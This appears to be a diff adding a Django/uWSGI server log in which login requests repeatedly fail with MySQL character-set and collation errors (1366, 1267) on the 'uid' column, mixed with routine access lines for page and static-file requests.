+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x9F\\x90\\xE6\\x83\\xB3...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 640/785] 114.87.230.234 () {48 vars in 1114 bytes} [Thu Jan 14 08:04:02 2021] POST /login/ => generated 209895 bytes in 165 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x9F\\x90\\xE6\\x83\\xB3...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x9F\\x90\\xE6\\x83\\xB3...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 641/786] 114.87.230.234 () {48 vars in 1116 bytes} [Thu Jan 14 08:04:30 2021] POST /login/ => generated 209897 bytes in 110 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Not Found: /
+[pid: 2069|app: 0|req: 642/787] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 08:04:55 2021] GET / => generated 3429 bytes in 7 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 233, in login
+ if len(models.User.objects.filter(uid=uid, password=pwd)) != 0:
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__
+ self._fetch_all()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all
+ self._result_cache = list(self._iterable_class(self))
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__
+ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+[pid: 2069|app: 0|req: 643/788] 114.87.230.234 () {48 vars in 1116 bytes} [Thu Jan 14 08:04:56 2021] POST /login/ => generated 183560 bytes in 127 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Not Found: /login.
+[pid: 2069|app: 0|req: 644/789] 219.228.146.246 () {38 vars in 823 bytes} [Thu Jan 14 08:04:57 2021] GET /login. => generated 3465 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 645/790] 219.228.146.246 () {38 vars in 823 bytes} [Thu Jan 14 08:05:20 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 646/791] 219.228.146.253 () {48 vars in 1009 bytes} [Thu Jan 14 08:05:25 2021] POST /login/ => generated 209925 bytes in 108 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 647/792] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:05:31 2021] POST /login/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 324 bytes (2 switches on core 0)
+[pid: 2069|app: 0|req: 648/793] 219.228.146.246 () {40 vars in 871 bytes} [Thu Jan 14 08:05:31 2021] GET /home/ => generated 7488 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 649/794] 219.228.146.253 () {38 vars in 826 bytes} [Thu Jan 14 08:05:32 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 2069|app: -1|req: -1/795] 219.228.146.253 () {40 vars in 815 bytes} [Thu Jan 14 08:05:32 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/796] 219.228.146.253 () {40 vars in 837 bytes} [Thu Jan 14 08:05:32 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/797] 219.228.146.253 () {40 vars in 819 bytes} [Thu Jan 14 08:05:32 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/798] 219.228.146.253 () {40 vars in 817 bytes} [Thu Jan 14 08:05:32 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/799] 219.228.146.253 () {40 vars in 823 bytes} [Thu Jan 14 08:05:32 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/800] 219.228.146.253 () {40 vars in 798 bytes} [Thu Jan 14 08:05:32 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/801] 219.228.146.253 () {40 vars in 814 bytes} [Thu Jan 14 08:05:32 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/802] 219.228.146.253 () {40 vars in 804 bytes} [Thu Jan 14 08:05:32 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/803] 219.228.146.253 () {40 vars in 796 bytes} [Thu Jan 14 08:05:32 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/804] 219.228.146.253 () {40 vars in 812 bytes} [Thu Jan 14 08:05:32 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/805] 219.228.146.253 () {40 vars in 869 bytes} [Thu Jan 14 08:05:32 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: 0|req: 650/806] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:05:41 2021] POST /login/ => generated 27 bytes in 22 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 651/807] 219.228.146.246 () {40 vars in 871 bytes} [Thu Jan 14 08:05:41 2021] GET /home/ => generated 7487 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE5\\xB9\\xB2\\xE9\\xA5\\xAD...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE5\\xB9\\xB2\\xE9\\xA5\\xAD...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 652/808] 219.228.146.253 () {48 vars in 960 bytes} [Thu Jan 14 08:05:49 2021] POST /login/ => generated 209584 bytes in 127 msecs (HTTP/1.1 500) 7 headers in 286 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 653/809] 219.228.146.253 () {40 vars in 814 bytes} [Thu Jan 14 08:06:07 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
